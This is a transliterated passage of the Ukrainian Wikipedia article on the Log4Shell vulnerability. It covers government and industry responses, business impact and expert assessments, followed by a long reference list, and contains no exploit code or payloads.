chi vikoristovuvavsya eksplojt Izrayilem Rosiyeyu chi SShA do rozkrittya vrazlivosti 19 51 Check Point zayavila sho 15 grudnya 2021 roku hakeri yaki pidtrimuye Iran sprobuvali proniknuti v merezhi pidpriyemstv ta uryadi Izrayilyu 19 Vidpovid ta vplivred Uryadovijred U Spoluchenih Shtatah direktor Agentstva z kiberbezpeki ta bezpeki infrastrukturi CISA Dzhen Isterli opisala eksplojt yak odin iz najserjoznishih yaksho ne najserjoznishij yakij ya bachiv za vsyu svoyu kar yeru poyasnivshi sho sotni miljoniv pristroyiv buli porusheni ta rekomenduvali postachalnikam pridilyati prioritetna uvaga onovlen programnogo zabezpechennya 8 52 53 Gromadyanski agentstva najnyati uryadom SShA mali do 24 grudnya 2021 roku vipraviti vrazlivosti hocha na toj chas ce vzhe dozvolilo b otrimati dostup do soten tisyach cilej 19 Kanadskij centr kiberbezpeki CCCS zaklikav organizaciyi vzhiti negajnih zahodiv 54 Podatkove upravlinnya Kanadi timchasovo vidklyuchilo svoyi onlajn servisi pislya togo yak diznalosya pro eksplojt todi yak uryad Kvebeku zakriv majzhe 4000 svoyih veb sajtiv yak preventivnij zahid 55 Federalne upravlinnya bezpeki Nimechchini BSI viznachilo eksplojt yak zagrozu sho znahoditsya na najvishomu rivni nazvavshi jogo nadzvichajno kritichnoyu nebezpechnoyu situaciyeyu perekladeno Vin takozh povidomiv sho kilka atak vzhe buli uspishnimi i sho masshtabi vrazlivosti yak i ranishe vazhko ociniti 56 57 Nacionalnij centr kiberbezpeki Niderlandiv NCSC rozpochav postijnij spisok vrazlivih program 58 59 Ministerstvo promislovosti ta informacijnih tehnologij Kitayu prizupinilo robotu z Alibaba Cloud yak partner z analizu zagroz kiberbezpeci na shist misyaciv cherez te sho ne povidomilo pro vrazlivist uryadu pershim 60 Biznesired Doslidzhennya provedene Wiz ta EY 18 pokazalo sho 93 hmarnogo korporativnogo seredovisha buli vrazlivi dlya Log4Shell 7 vrazlivih robochih navantazhen dostupni v Interneti i shilni do shirokih sprob ekspluataciyi Zgidno z doslidzhennyam cherez desyat dniv pislya publikaciyi vrazlivosti 20 grudnya 2021 roku lishe 45 vrazlivih robochih navantazhen bulo vipravleno v serednomu v hmarnih seredovishah Hmarni dani Amazon Google i Microsoft torknulisya Log4Shell 19 Kompaniya z upravlinnya personalom i personalom UKG odna z najbilshih kompanij u galuzi zaznala ataki program vimagachiv sho torknulasya velikih pidpriyemstv 21 61 UKG zayavila sho vona ne maye dokaziv vikoristannya Log4Shell v incidenti hocha analitik Allan Liska z kompaniyi Recorded Future sho zajmayetsya kiberbezpekoyu skazav sho mozhlivo isnuye zv yazok 62 Oskilki veliki kompaniyi pochali vipuskati vipravlennya dlya eksplojtu rizik dlya malogo biznesu zbilshivsya oskilki hakeri zoseredilisya na bilsh vrazlivih cilyah 47 Konfidencijnistred Personalni pristroyi taki yak Smart TV ta kameri videosposterezhennya pidklyucheni do Internetu buli vrazlivimi dlya eksplojtu 19 Analizred Stanom na 14 grudnya 2021 roku majzhe polovinu vsih korporativnih merezh u sviti bulo aktivno doslidzheno i protyagom dobi bulo stvoreno ponad 60 variantiv eksplojtu 63 Check Point Software Technologies u dokladnomu analizi opisala situaciyu yak spravzhnyu kiberpandemiyu ta oharakterizuvala mozhlivist zavdannya shkodi yak nezlichennu 64 U kilkoh pochatkovih rekomendaciyah bulo zavisheno kilkist vrazlivih paketiv sho prizvodilo do pomilkovih spracovuvan Zokrema paket log4j api buv vidznachenij yak urazlivij todi yak naspravdi podalshi doslidzhennya pokazali sho vrazlivim buv lishe osnovnij paket log4j core Ce bulo pidtverdzheno yak u vihidnij galuzi vipusku 65 tak i zovnishnimi doslidnikami bezpeki Tehnologichnij zhurnal Wired napisav sho nezvazhayuchi na poperednij galas navkolo chislennih urazlivostej galas navkolo vrazlivosti Log4j vipravdovuye sebe z cilogo ryadu prichin 51 Zhurnal poyasnyuye sho vsyudisutnist log4j vrazlivist yakoyi vazhko viyaviti za potencijnimi cilyami i legkist peredachi kodu na komp yuter zhertvi stvorili poyednannya serjoznosti dostupnosti ta poshirenosti yaka vrazila fahivciv z bezpeki 51 Wired takozh shematichno predstaviv poslidovnist vikoristannya Log4Shell hakerami grupi sho zajmayutsya majningom kriptovalyut pershimi pochnut ekspluatuvati vrazlivist potim torgovci danimi prodadut placdarm kiberzlochincyam yaki nareshti zajmutsya vimagannyam shpigunstvom ta znishennyam danih 51 Amit Joran generalnij direktor Tenable i direktor zasnovnik grupi gotovnosti do komp yuternih nadzvichajnih situacij u SShA zayaviv Log4Shell bezumovno najbilsha ta kritichna vrazlivist v istoriyi zaznachivshi sho vitoncheni ataki pochalisya nevdovzi pislya pomilki zayavivshi Mi takozh vzhe bachimo sho vin vikoristovuyetsya dlya atak program vimagachiv sho znovu zh taki maye stati serjoznim signalom trivogi Mi takozh bachili povidomlennya pro zlovmisnikiv yaki vikoristovuyut Log4Shell dlya znishennya sistem navit ne namagayuchis otrimati vikup dosit nezvichajne povedinka 51 Starshij doslidnik zagroz Sophos Shon Gallaher skazav Chesno kazhuchi najbilsha zagroza tut polyagaye v tomu sho lyudi vzhe otrimali dostup i prosto koristuyutsya nim i navit yaksho vi usunete problemu htos vzhe perebuvaye v merezhi Vin bude isnuvati stilki zh skilki j Internet 20 Primitkired a b v Wortley Free 9 grudnya 2021 Log4Shell RCE 0 day exploit found in log4j 2 a popular Java logging package LunaSec angl Arhiv originalu za 25 grudnya 2021 Procitovano 12 grudnya 2021 CVE 2021 44228 Common Vulnerabilities and Exposures Arhiv originalu za 25 grudnya 2021 Procitovano 12 grudnya 2021 Povolny Steve 10 grudnya 2021 Log4Shell Vulnerability is the Coal in our Stocking for 2021 McAfee angl Arhiv originalu za 24 grudnya 2021 Procitovano 12 grudnya 2021 Worst Apache Log4j RCE Zero day Dropped on Internet Cyber Kendra 9 grudnya 2021 Arhiv originalu za 24 grudnya 2021 Procitovano 12 grudnya 2021 a b v g Newman Lily Hay 10 grudnya 2021 The Internet Is on Fire Wired amer ISSN 1059 1028 Arhiv originalu za 24 grudnya 2021 Procitovano 12 grudnya 2021 Murphy Hannah 14 grudnya 2021 Hackers launch more than 1 2m attacks through Log4J flaw Financial Times Arhiv originalu za 17 grudnya 2021 Procitovano 17 grudnya 2021 a b Apache Log4j Security Vulnerabilities Log4j Apache Software Foundation Arhiv originalu za 26 grudnya 2021 Procitovano 12 grudnya 2021 a b v g d e Murphy Hannah 14 grudnya 2021 Hackers launch more than 1 2m attacks through Log4J flaw Financial Times Arhiv originalu za 21 grudnya 2021 Procitovano 17 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite news title Shablon Cite news cite news a Vkazano bilsh nizh odin accessdate ta access date dovidka Hunter Tatum 20 grudnya 2021 The most serious security breach ever is unfolding right now Here s what you need to know The Washington Post Arhiv originalu za 27 grudnya 2021 Procitovano 25 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite web title Shablon Cite web cite web a Vkazano bilsh nizh odin url status ta deadlink dovidka a b Mott Nathaniel 10 grudnya 2021 Countless Servers Are Vulnerable to Apache Log4j Zero Day Exploit PC Magazine angl Arhiv originalu za 24 grudnya 2021 Procitovano 12 grudnya 2021 Goodin Dan 10 grudnya 2021 Zero day in ubiquitous Log4j tool poses a grave threat to the Internet Ars Technica amer Arhiv originalu za 23 grudnya 2021 Procitovano 12 grudnya 2021 Apache projects affected by log4j CVE 2021 44228 14 grudnya 2021 Arhiv originalu za 17 grudnya 2021 Procitovano 25 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite web title Shablon Cite web cite web a Vkazano bilsh nizh odin url status ta deadlink dovidka Update for Apache Log4j2 Issue CVE 2021 44228 Amazon Web Services 12 grudnya 2021 Arhiv originalu za 28 grudnya 2021 Procitovano 13 grudnya 2021 Lovejoy Ben 14 grudnya 2021 Apple patches Log4Shell iCloud vulnerability described as most critical in a decade 9to5mac Arhiv originalu za 23 grudnya 2021 Procitovano 25 grudnya 2021 Security Vulnerability in Minecraft Java Edition Minecraft Mojang Studios Arhiv originalu za 24 grudnya 2021 Procitovano 13 grudnya 2021 Goodin Dan 10 grudnya 2021 The Internet s biggest players are all affected by critical Log4Shell 0 day ArsTechnica Arhiv originalu za 25 grudnya 2021 Procitovano 13 grudnya 2021 Rundle David Uberti and James 15 grudnya 2021 What Is the Log4j Vulnerability Arhiv originalu za 25 grudnya 2021 Procitovano 25 grudnya 2021 a b Enterprises halfway through patching Log4Shell Wiz Blog www wiz io Arhiv originalu za 20 grudnya 2021 Procitovano 20 grudnya 2021 a b v g d e zh i k Hunter Tatum de Vynck Gerrit 20 grudnya 2021 The most serious security breach ever is unfolding right now Here s what you need to know The Washington Post Arhiv originalu za 27 grudnya 2021 Procitovano 25 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite web title Shablon Cite web cite web a Vkazano bilsh nizh odin url status ta deadlink dovidka a b Barrett Brian The Next Wave of Log4J Attacks Will Be Brutal Wired amer ISSN 1059 1028 Arhiv originalu za 17 grudnya 2021 Procitovano 17 grudnya 2021 a b Goodin Dan 13 grudnya 2021 As Log4Shell wreaks havoc payroll service reports ransomware attack Ars Technica amer Arhiv originalu za 17 grudnya 2021 Procitovano 17 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite web title Shablon Cite web cite web a Vkazano bilsh nizh odin url status ta deadlink dovidka Yan Tao 10 grudnya 2021 Another Apache Log4j Vulnerability Is Actively Exploited in the Wild CVE 2021 44228 Unit 42 angl Palo Alto Networks Arhiv originalu za 24 grudnya 2021 Procitovano 25 grudnya 2021 Apache Log4j 2 Apache Software Foundation Arhiv originalu za 14 grudnya 2021 Procitovano 12 grudnya 2021 a b Byrnes Jesse 14 grudnya 2021 Hillicon Valley Apache vulnerability sets off alarm bells TheHill angl Arhiv originalu za 17 grudnya 2021 Procitovano 17 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite web title Shablon Cite web cite web a Vkazano bilsh nizh odin url status ta deadlink dovidka RFC rfc4511 doi 10 17487 RFCrfc4511 Graham Cumming John 10 grudnya 2021 Inside the Log4j2 vulnerability CVE 2021 44228 The Cloudflare Blog angl Arhiv originalu za 22 grudnya 2021 Procitovano 13 grudnya 2021 Graham Cumming John 10 grudnya 2021 Inside the Log4j2 vulnerability CVE 2021 44228 The Cloudflare Blog angl Arhiv originalu za 22 grudnya 2021 Procitovano 13 grudnya 2021 Lookups Log4j Apache Software Foundation Arhiv originalu za 25 grudnya 2021 Procitovano 13 grudnya 2021 Graham Cumming John 10 grudnya 2021 Inside the Log4j2 vulnerability CVE 2021 44228 The Cloudflare Blog angl Arhiv originalu za 22 grudnya 2021 Procitovano 13 grudnya 2021 a b Ducklin Paul 12 grudnya 2021 Log4Shell explained how it works why you need to know and how to fix it Naked Security Sophos Arhiv originalu za 26 grudnya 2021 Procitovano 12 grudnya 2021 Miessler Daniel 13 grudnya 2021 The log4j Log4Shell Situation Unsupervised Learning Arhiv originalu za 13 grudnya 2021 Procitovano 25 grudnya 2021 Duraishamy Ranga 13 grudnya 2021 Patch Now Apache Log4j Vulnerability Called Log4Shell Actively Exploited Trend Micro Arhiv originalu za 20 grudnya 2021 Procitovano 14 grudnya 2021 Narang Satnam 10 grudnya 2021 CVE 2021 44228 Proof of Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available Log4Shell Tenable Blog Arhiv originalu za 20 grudnya 2021 Procitovano 14 grudnya 2021 Gabor Gabriel 10 grudnya 2021 CVE 2021 44228 Log4j RCE 0 day mitigation The Cloudflare Blog Arhiv originalu za 23 grudnya 2021 Procitovano 13 grudnya 2021 Hahad Mounir 12 grudnya 2021 Apache Log4j Vulnerability CVE 2021 44228 Raises widespread Concerns Arhiv originalu za 13 grudnya 2021 Procitovano 12 grudnya 2021 Graham Cumming John 10 grudnya 2021 Inside the Log4j2 vulnerability CVE 2021 44228 The Cloudflare Blog angl Arhiv originalu za 22 grudnya 2021 Procitovano 13 grudnya 2021 Restrict LDAP access via JNDI by rgoers 608 Log4j angl 5 grudnya 2021 Arhiv originalu za 30 grudnya 2021 Procitovano 12 grudnya 2021 Berger Andreas 17 grudnya 2021 What is Log4Shell The Log4j vulnerability explained and what to do about it Dynatrace news Arhiv originalu za 21 grudnya 2021 Procitovano 25 grudnya 2021 Apache issued a patch for CVE 2021 44228 version 2 15 on December 6 However this patch left part of the vulnerability unfixed resulting in CVE 2021 45046 and a second patch version 2 16 released on December 13 Apache released a third patch version 2 17 on December 17 to fix another related vulnerability CVE 2021 45105 Rudis boB 10 grudnya 2021 Widespread Exploitation of Critical Remote Code Execution in Apache Log4j Rapid7 Blog Rapid7 angl Arhiv originalu za 21 grudnya 2021 Procitovano 25 grudnya 2021 CVE 2021 45046 Common Vulnerabilities and Exposures 15 grudnya 2021 Arhiv originalu za 25 grudnya 2021 Procitovano 15 grudnya 2021 Greig Jonathan 14 grudnya 2021 Second Log4j vulnerability discovered patch already released ZDNet angl Arhiv originalu za 27 grudnya 2021 Procitovano 17 grudnya 2021 CVE 2021 45046 Common Vulnerabilities and Exposures 15 grudnya 2021 Arhiv originalu za 25 grudnya 2021 Procitovano 15 grudnya 2021 CVE 2021 45046 Common Vulnerabilities and Exposures 15 grudnya 2021 Arhiv originalu za 25 grudnya 2021 Procitovano 15 grudnya 2021 Java TM SE Development Kit 8 Update 121 JDK 8u121 Release Notes angl Oracle 17 sichnya 2017 Arhiv originalu za 19 grudnya 2021 Procitovano 13 grudnya 2021 Exploiting JNDI Injections in Java Veracode 3 sichnya 2019 Arhiv originalu za 15 grudnya 2021 Procitovano 15 grudnya 2021 Guide How To Detect and Mitigate the Log4Shell Vulnerability CVE 2021 44228 www lunasec io angl 13 grudnya 2021 Arhiv originalu za 24 grudnya 2021 Procitovano 13 grudnya 2021 a b Woodyard Chris Critical vulnerability Smaller firms may find it harder to stop hackers from exploiting Log4j flaw USA Today amer Procitovano 17 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite web title Shablon Cite web cite web a Obslugovuvannya CS1 Storinki z parametrom url status ale bez parametra archive url posilannya Exploit activity for Apache Log4j vulnerability CVE 2021 44228 Greynoise Research 10 grudnya 2021 Arhiv originalu za 20 grudnya 2021 Procitovano 14 grudnya 2021 Duckett Chris Log4j RCE activity began on 1 December as botnets start using vulnerability ZDNet angl Arhiv originalu za 22 grudnya 2021 Procitovano 13 grudnya 2021 Zugec Martin 13 grudnya 2021 Technical Advisory Zero day critical vulnerability in Log4j2 exploited in the wild Business Insights Bitdefender Arhiv originalu za 15 grudnya 2021 Procitovano 25 grudnya 2021 a b v g d Barrett Brian The Next Wave of Log4J Attacks Will Be Brutal Wired amer ISSN 1059 1028 Arhiv originalu za 27 grudnya 2021 Procitovano 17 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite news title Shablon Cite news cite news a Vkazano bilsh nizh odin accessdate ta access date dovidka Statement from CISA Director Easterly on Log4j Vulnerability CISA 11 grudnya 2021 Arhiv originalu za 27 grudnya 2021 Procitovano 25 grudnya 2021 Woodyard Chris Critical vulnerability Smaller firms may find it harder to stop hackers from exploiting Log4j flaw USA Today amer Procitovano 17 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite web title Shablon Cite web cite web a Obslugovuvannya CS1 Storinki z parametrom url status ale bez parametra archive url posilannya Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action Government of Canada angl 12 grudnya 2021 Arhiv originalu za 20 grudnya 2021 Procitovano 25 grudnya 2021 Arhivovano 2021 12 20 u Wayback Machine Cabrera Holly 12 grudnya 2021 Facing cybersecurity threats Quebec shuts down government websites for evaluation CBC News Arhiv originalu za 20 grudnya 2021 Procitovano 12 grudnya 2021 Sauerwein Jorg 12 grudnya 2021 BSI warnt vor Sicherheitslucke Tagesschau nim Arhiv originalu za 5 sichnya 2022 Procitovano 25 grudnya 2021 Warnstufe Rot Schwachstelle Log4Shell fuhrt zu extrem kritischer Bedrohungslage Presreliz nim 11 grudnya 2021 Arhiv originalu za 13 grudnya 2021 Procitovano 25 grudnya 2021 J Vaughan Nichols Steven 14 grudnya 2021 Log4Shell We Are in So Much Trouble The New Stack Arhiv originalu za 23 grudnya 2021 Procitovano 25 grudnya 2021 NCSC NL log4shell National Cyber Security Centre Netherlands Arhiv originalu za 29 grudnya 2021 Procitovano 14 grudnya 2021 Apache Log4j bug China s industry ministry pulls support from Alibaba Cloud for not reporting flaw to government first Arhiv originalu za 25 grudnya 2021 Procitovano 25 grudnya 2021 Bray Hiawatha 15 grudnya 2021 Emerging Log4j software bug spawns worldwide worry over cyber attacks The Boston Globe The Boston Globe amer Arhiv originalu za 17 grudnya 2021 Procitovano 17 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite web title Shablon Cite web cite web a Vkazano bilsh nizh odin url status ta deadlink dovidka Bray Hiawatha 15 grudnya 2021 Emerging Log4j software bug spawns worldwide worry over cyber attacks The Boston Globe The Boston Globe amer Arhiv originalu za 17 grudnya 2021 Procitovano 17 grudnya 2021 a href wiki D0 A8 D0 B0 D0 B1 D0 BB D0 BE D0 BD Cite web title Shablon Cite web cite web a Vkazano bilsh nizh odin url status ta deadlink dovidka Almost half of networks probed for Log4Shell weaknesses ComputerWeekly 14 grudnya 2021 Arhiv originalu za 20 grudnya 2021 Procitovano 25 grudnya 2021 The numbers behind a cyber pandemic detailed dive Check Point Software 13 grudnya 2021 Arhiv originalu za 24 grudnya 2021 Procitovano 25 grudnya 2021 LOG4J2 3201 Limit the protocols JNDI can use and restrict LDAP Apache s JIRA issue tracker Arhiv originalu za 25 grudnya 2021 Procitovano 14 grudnya 2021 Otrimano z https uk wikipedia org wiki Log4Shell